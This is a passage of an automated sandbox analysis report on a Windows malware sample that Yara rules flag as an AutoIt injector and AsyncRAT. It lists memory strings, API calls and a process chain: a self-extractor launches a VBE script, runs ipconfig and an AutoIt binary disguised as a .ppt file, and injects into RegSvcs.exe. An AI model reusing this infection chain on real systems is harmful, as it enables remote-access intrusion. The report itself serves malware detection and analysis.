          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `hc\t4memstr_f369dfa8-b
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l:::{26ee0668-a00a-44d7-9371-beb064c98683}\0\::{15eae92e-f17a-4431-9f28-805e482dafd4}memstr_7547befe-7
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: setup=pgoh.vbememstr_352a0f4c-1
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempmodememstr_eae23589-b
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: silent=1.exemmmemstr_dc3b46fa-2
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ()*,45:memstr_21999627-f
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stxydmemstr_068bd761-8
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mnxzdmemstr_c389767a-4
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qxabdmemstr_270ae82a-9
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +-459memstr_2f4e581c-6
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )*+,.01memstr_16f4b171-7
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ).234memstr_3615f366-a
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "&'56memstr_b38872c6-1
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "#$%56memstr_aa503bf6-1
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9:;<=>?memstr_9c713f6a-2
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @abcdefghimemstr_ee139a32-f
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }:rv9memstr_5dbe6974-e
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windowspropertydescriptionsmemstr_9cca2bd2-f
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\music\desktop.inilmemstr_93736060-2
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: externalobjectownermemstr_c69436a2-b
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\netutils.dll3>lmemstr_43ee1c5b-4
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\desktop\desktop.ini->rmemstr_57f10e57-f
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8c:\users\public\desktop.ini'>xmemstr_9cf984df-5
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wintypes.dllmemstr_324ff9bd-c
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\pictures\desktop.inimemstr_71aec982-0
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\network shortcutsmemstr_55f0b99f-5
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\onedrive\desktop.ini]>memstr_81c38761-6
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: property system both class factoryw>memstr_28367a21-2
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\propsys.dlllmemstr_8d087871-f
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\videos\desktop.inimemstr_d7ece88b-c
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\iertutil.dllmemstr_c242286d-d
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: property system both class factory7?hmemstr_77accdd0-9
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\contacts\desktop.ini!?~memstr_c8d4cae0-0
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\searches\desktop.inimemstr_9d2f21df-e
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\links\desktop.ininis?memstr_bfb4d103-b
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\cfgmgr32.dllm?memstr_37527326-c
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\accountpicturesg?memstr_745ffdbf-0
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\roamedtileimagesq?memstr_d65194d8-b
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\propsys.dllle?memstr_8d8b04da-5
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\printer shortcutsmemstr_605d2285-d
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\start menu placesmemstr_4d2c6764-8
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lmem8memstr_a17df95a-7
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\textinputframework.dllmemstr_fd14404f-2
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9k`psmemstr_815d6643-e
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user-pc\usermemstr_2c66faf8-7
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |vbctmemstr_306d616a-7
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\rarsfx0\pgoh.vbeq:5memstr_784a14e3-d
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 49bu\memstr_91225b1f-c
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 49bu\umemstr_1bfbe727-a
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pce 0tmemstr_e921e0b3-8
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mponents.dllmemstr_20ec0157-6
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\coreuicomponents.dllmemstr_db88a0b5-9
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "systemmemstr_b34f47f9-0
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dd39ad0-238f-46af-adb4-6c85480369c7}x32\wimemstr_d1015c73-5
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gamel$:memstr_743f688e-e
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: foldermemstr_0667a607-d
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gamermemstr_0f60b0b4-a
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: emailmemstr_c3767b32-9
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: foldermemstr_3b353ad5-4
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %/;gykmemstr_bd33435a-c
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w'o/memstr_6319eb46-4
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w:x4<memstr_62e615d6-c
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cbu8smemstr_2042b752-6
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: common administrative tools<&2memstr_4dd609f5-e
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: homegroupcurrentuserfolder4&:memstr_56ea6bb5-f
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\templates,&memstr_61fbef19-3
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: changeremoveprogramsfoldermemstr_a76ec980-7
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\inetcachememstr_4b33a190-a
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\templatesmemstr_9437079c-2
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: savedpictures.library-mst&zmemstr_c846e1ad-0
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: common start menu placesl&bmemstr_f77b06af-a
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\recent\&rmemstr_3cb65ab1-c
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\desktop.init&zmemstr_f68de724-a
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt authority\networkservicel&memstr_477f76ab-b
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\ringtonesd&memstr_abb87f32-b
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\librariesmemstr_1c01fae8-5
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: visiocustom.propdescmemstr_0668c27c-b
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell file system foldermemstr_116b1ef4-5
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cbuxrmemstr_0bb50e46-9
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\burn\burnmemstr_9d3f8ae1-f
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\ringtonesmemstr_19590751-d
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\historymemstr_a08080a4-b
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\sendtomemstr_c8511cf5-d
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\drivers<'2memstr_d2ed74fc-1
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p$,u$memstr_cda9f08b-8
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n|'rmemstr_85f46b53-a
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nl'bmemstr_f3f9ea09-3
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: coremessagingd'jmemstr_cee13907-2
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n\'rmemstr_a59fc425-4
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: audio/mpeg memstr_8d1aedfd-9
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @a jmemstr_ee8c0465-4
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075BB02 SendInput,keybd_event,6_2_0075BB02
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075EBE5 mouse_event,6_2_0075EBE5
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cipkucw.ppt xdgrnj.pdfJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt cipkucw.ppt xdgrnj.pdfJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_007513F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_007513F2
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00751EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,6_2_00751EF3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: cipkucw.ppt, 00000006.00000003.1894814022.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894903844.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1898812044.0000000000DF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: cipkucw.ppt, cipkucw.ppt.exeBinary or memory string: Shell_TrayWnd
          Source: cipkucw.ppt, 00000006.00000002.1901492335.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947893692.0000000001534000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160662377.0000000000B3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
          Source: cipkucw.ppt.exe, 0000000F.00000003.2021858998.0000000001541000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021874617.0000000001542000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" ThenKK
          Source: cipkucw.ppt.exe, 00000013.00000003.2241821530.0000000001653000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2241782650.000000000164E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" ThenLL
          Source: xdgrnj.pdf.6.dr, xdgrnj.pdf.0.drBinary or memory string: If WinGetText("Program Manager") = "0" Then
          Source: cipkucw.ppt.exe, 00000011.00000003.2166743027.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160554746.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165570776.0000000000B81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5
          Source: cipkucw.ppt.exe, 00000013.00000003.2169637016.0000000001643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" ThenU,
          Source: cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Thency

          Language, Device and Operating System Detection

          barindex
          Yara detected Autoit Injector
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt PID: 1420, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 3484, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 3732, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 5780, type: MEMORYSTR
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00296694 cpuid 0_2_00296694
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0028FD34
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0029454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0029454A
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0074E5F8 GetUserNameW,6_2_0074E5F8
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0072BF0F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,6_2_0072BF0F
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_002803BE GetVersionExW,0_2_002803BE
          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Yara detected AsyncRAT
          Source: Yara matchFile source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt PID: 1420, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2800, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 3484, type: MEMORYSTR
